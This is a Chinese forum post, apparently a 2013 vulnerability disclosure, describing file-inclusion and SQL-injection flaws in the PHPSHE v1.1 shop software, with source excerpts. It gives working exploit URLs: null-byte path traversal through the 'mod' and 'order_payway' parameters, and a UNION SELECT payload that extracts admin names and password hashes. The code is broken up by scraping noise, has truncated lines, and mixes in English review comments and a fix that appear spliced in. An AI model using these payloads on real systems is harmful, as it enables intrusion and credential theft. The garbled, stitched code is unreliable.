phpshe v1.1多处SQL注入和文件包含漏洞Getshell

发表于 2013-4-16 16:45:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/
/* Phpshe v1.1 Vulnerability
/* ========================
/* By: Kn1f3
/* E-Mail : 681796@qq.com
/*******************************************************/
0×00 整体大概参数传输

//common.php
// Import request data as prefixed globals: $_g_* from GET, $_p_* from POST,
// $_s_* from the session and $_c_* from cookies. pe_trim() and, when magic
// quotes are on, pe_stripslashes() are applied first. With EXTR_PREFIX_ALL
// every key the client sends becomes a variable in this scope, so nothing
// here restricts which variable names get created.
if (get_magic_quotes_gpc()) {
    if (!empty($_GET)) {
        extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
    }
    if (!empty($_POST)) {
        extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
    }
} else {
    if (!empty($_GET)) {
        extract(pe_trim($_GET), EXTR_PREFIX_ALL, '_g');
    }
    if (!empty($_POST)) {
        extract(pe_trim($_POST), EXTR_PREFIX_ALL, '_p');
    }
}

session_start();
if (!empty($_SESSION)) {
    extract(pe_trim($_SESSION), EXTR_PREFIX_ALL, '_s');
}
// Cookies are stripslashed regardless of the magic-quotes setting.
if (!empty($_COOKIE)) {
    extract(pe_trim(pe_stripslashes($_COOKIE)), EXTR_PREFIX_ALL, '_c');
}

0×01 包含漏洞

//首页文件
<?php
include('common.php');

// Cached lookup tables consumed by the templates.
$cache_category     = cache::get('category');
$cache_category_arr = cache::get('category_arr');
$cache_class        = cache::get('class');
$cache_ad           = cache::get('ad');
$cache_link         = cache::get('link');
$cache_page         = cache::get('page');

// Site QQ contacts: the setting is a comma-separated list, or nothing at all.
if ($cache_setting['web_qq']['setting_value']) {
    $web_qq = explode(',', $cache_setting['web_qq']['setting_value']);
} else {
    $web_qq = array();
}

// Cart item count. Logged-in users are counted from the database; guests
// from the cart list kept in the cookie ($_c_cart_list is extracted from
// $_COOKIE in common.php).
// NOTE(review): unserialize() runs on raw cookie data here, before any
// validation — treat this as untrusted-input deserialization.
if (pe_login('user')) {
    $cart_num = $db->pe_num('cart', array('user_id' => $_s_user_id));
} else {
    $cart_num = unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0;
}

// Dispatch. $mod is taken from the request in common.php, so the include
// path is attacker-influenced — a (limited) file-inclusion issue.
include("{$pe['path_root']}module/{$module}/{$mod}.php");
pe_result();
?>
//common 文件 第15行开始
//url路由配置
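// URL routing. Defaults first; a POST value overrides GET, GET overrides
// the default. $id is also resolved here but is otherwise undefined before
// this point.
$module = $mod = $act = 'index';
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);

// $mod is later used as a path component of include() calls
// (index.php: module/{$module}/{$mod}.php). A value containing '/', '.' or
// a NUL byte would let the request pick an arbitrary file, so fail closed:
// anything outside [A-Za-z0-9_] falls back to the default route.
// \A and \z are used instead of ^ and $ so a trailing newline cannot slip
// past the check.
if (!preg_match('/\A[A-Za-z0-9_]+\z/', (string) $mod)) {
    $mod = 'index';
}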
( k+ D8 N6 ?: ~1 Q% A* r( E& x0 z' P//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
# }  Z6 Q6 @2 A5 Y4 s& u



0×02 搜索注入


//product.php文件
case 'list':
! y- L+ @# f2 P+ c4 O2 `$category_id = intval($id);
3 T5 X3 e, H+ n4 }$info = $db->pe_select('category', array('category_id'=>$category_id));
" W( L6 y2 V  U) R6 g" ~//搜索
4 b1 B+ L2 I9 y' D3 d6 m, s. b  ], Q  P$sqlwhere = " and `product_state` = 1";
: C) s. Y# v5 kpe_lead('hook/category.hook.php');
) w+ d- ], o* ^& s: F$ M4 Vif ($category_id) {8 y9 d* h# X% x( r: m7 @
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
' C9 e* z4 S1 Z, l$ [( l8 s& v5 Q) L+ x}8 X+ W' g* B0 O$ n! o
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤6 E; s( X  x# N9 v% G$ [
if ($_g_orderby) {
% X. X5 e' m( I0 c) D$orderby = explode('_', $_g_orderby);. S* R7 E  V& |" j! K1 q
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";2 m' ~$ b$ K3 ]2 G; r; N8 c
}
8 Y7 N4 L' J( W9 E, v' Jelse {% M8 K9 s2 a) A8 F. D- ^! B' ^/ T
$sqlwhere .= " order by `product_id` desc";' A6 E. F; H  v, @8 k6 e
}4 A- Z. H  `- `7 H3 O) H, u
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));( U( i0 _7 Z6 O7 c  h
//热卖排行
  `' s' D* T& Q- @2 u$product_hotlist = product_hotlist();
3 a* z1 G5 K; a//当前路径8 @( C* F' G$ a( r7 D! L
$nowpath = category_path($category_id);
+ D; L5 A* \# V: {) [$seo = pe_seo($info['category_name']);
  W9 |* u9 ?$ P# Kinclude(pe_tpl('product_list.html'));
//跟进selectall函数库
/**
 * Select all rows of `dbpre.$table` that match $where.
 *
 * @param string       $table      table name without the dbpre prefix
 * @param string|array $where      condition; run through _dowhere() first
 *                                 (callers on this page pass both an array
 *                                 and a pre-built " and ... order by ..." string)
 * @param string       $field      column list, default '*'
 * @param array        $limit_page paging parameters handed to sql_selectall()
 *
 * NOTE(review): $field and $table are interpolated into the SQL verbatim, and
 * whether _dowhere() escapes a string $where is not visible here. product.php
 * builds that string with the raw `keyword` request value, so any escaping
 * has to happen before this method is reached.
 */
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
{
    $sql = sprintf(
        'select %s from `%s%s` %s',
        $field,
        dbpre,
        $table,
        $this->_dowhere($where)
    );

    return $this->sql_selectall($sql, $limit_page);
}
//exp+ ~/ S9 _( Y& k+ g" T# {/ F1 Z
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
0×03 包含漏洞2

//order.php

case 'pay':


# l* V% e# e9 @( X# E/ t; n# Y9 g$order_id = pe_dbhold($_g_id);

; M5 C( U$ S$ r$ T7 e3 A9 Z
$cache_payway = cache::get('payway');


: X+ h0 m2 W9 _5 F1 M: [foreach($cache_payway as $k => $v) {

: g( W& b, n% r4 @' R
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

4 M- k/ n. A0 h7 P$ x
if ($k == 'bank') {

) o. g. M- c0 v* ~, ^
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


- {5 K9 p, j, t2 c6 |# [}


# p3 O' m/ E2 N" o  w}


" ^- M4 f( u* N* l& V- [$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

% }! k2 ]0 s. c. c
!$order['order_id'] && pe_error('订单号错误...');


% D4 |+ S- W/ I) ~  i6 ]if (isset($_p_pesubmit)) {

; M8 r$ i( h% j9 `. n3 M
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {


8 v, R  A9 T8 z- J) t; V2 o$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));


( n1 h# l8 V8 _$ \% d( u; ?foreach ($info_list as $v) {

( W7 ^/ u. z5 M* Q
$order['order_name'] .= "{$v['product_name']};";
! ^: x& f, _0 o# u7 N- R


2 @8 w( F. D2 n, f) _& ~/ |}


$ x0 m4 X( H- F' z1 u4 Jecho '正在为您连接支付网站,请稍后...';

& }0 N' g/ |2 X/ J
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


$ g7 `9 Y' I$ e5 _2 x- c}//当一切准备好的时候就可以进行"鸡肋包含了"

4 T- P7 O' g$ j% N
else {

3 a1 x+ Q$ G. y/ ]1 K
pe_error('支付错误...');


/ u' Y0 g. }! q5 I}

7 ^# Y: s! B" H
}

1 Q% Y7 r* x, F# q/ v5 e
$seo = pe_seo('选择支付方式');

) o5 J/ t* Z+ r% |+ \, y$ k
include(pe_tpl('order_pay.html'));


: r8 _: q0 O0 }1 e' Nbreak;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
http://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg
